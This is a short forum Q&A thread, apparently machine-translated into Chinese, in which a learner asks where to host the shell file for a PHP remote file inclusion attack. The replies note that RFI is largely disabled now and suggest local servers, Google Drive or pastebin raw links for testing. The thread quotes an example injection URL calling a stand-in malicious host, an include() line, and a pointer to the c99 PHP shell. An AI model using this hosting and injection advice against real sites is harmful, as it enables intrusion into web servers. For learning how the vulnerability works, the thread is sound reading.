所以我正在学习RFI,LFI,并得到了一个简单的问题。许多示例显示了如何将PHP文件插入页面以提取不同的信息。我的问题是我在哪里上传这个.txt文件?例如,如您所见:
http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
这是为了我的学习,我搜索了很多,但无法弄清楚这个简单的事情。有没有特定的网站?
谢谢。
您将在通过 Tor 和被黑客入侵的匿名鼠标代理访问的俄罗斯服务器上上传此文本文件,从网吧,您不必向商店所有者注册,也没有日志记录,在万圣节穿着风衣和山羊面具。
谷歌搜索"c99 php shell"。
如果将 php 代码放在 txt 文件中,放入配置了 PHP 的服务器上的 php 文件中,它将在之前呈现。大约几年前,您可以在谷歌上搜索网站,每页找到 5 个易受攻击的网站。PHP 通过include
和其他安全增强功能禁用远程文件包含来解决这个问题。
在99%的服务器上,include('http://www.malicious.com/shell.txt');
不再可能。
PHP文件http://www.vulnerable.com/test.php?file=
将是您要破解的文件。
没关系。。RFI已经过时了,有更酷的破解方法,主要是SQL注入或CSF。
为了进行测试,文件可以上传到任何地方,可用空间,您的本地服务器(Google:xampp,wampserver),Google云端硬盘,甚至可以上传您要测试的网站,例如 http://www.vulnerable.com/test.php?file=http://www.vulnerable.com/shell.txt。
为简单起见,您还可以尝试 pastebin.com:http://pastebin.com/然后找到粘贴文本的原始链接,例如:http://pastebin.com/raw.php?i=GK9m8dAL
理解正确的话:你展示的只是一个例子。它表明 php 脚本 "test.php" 可能是一个漏洞,因为它可能被 "shell.txt" (RFI) 滥用。
"www.malicious.com"不是"真实"地址。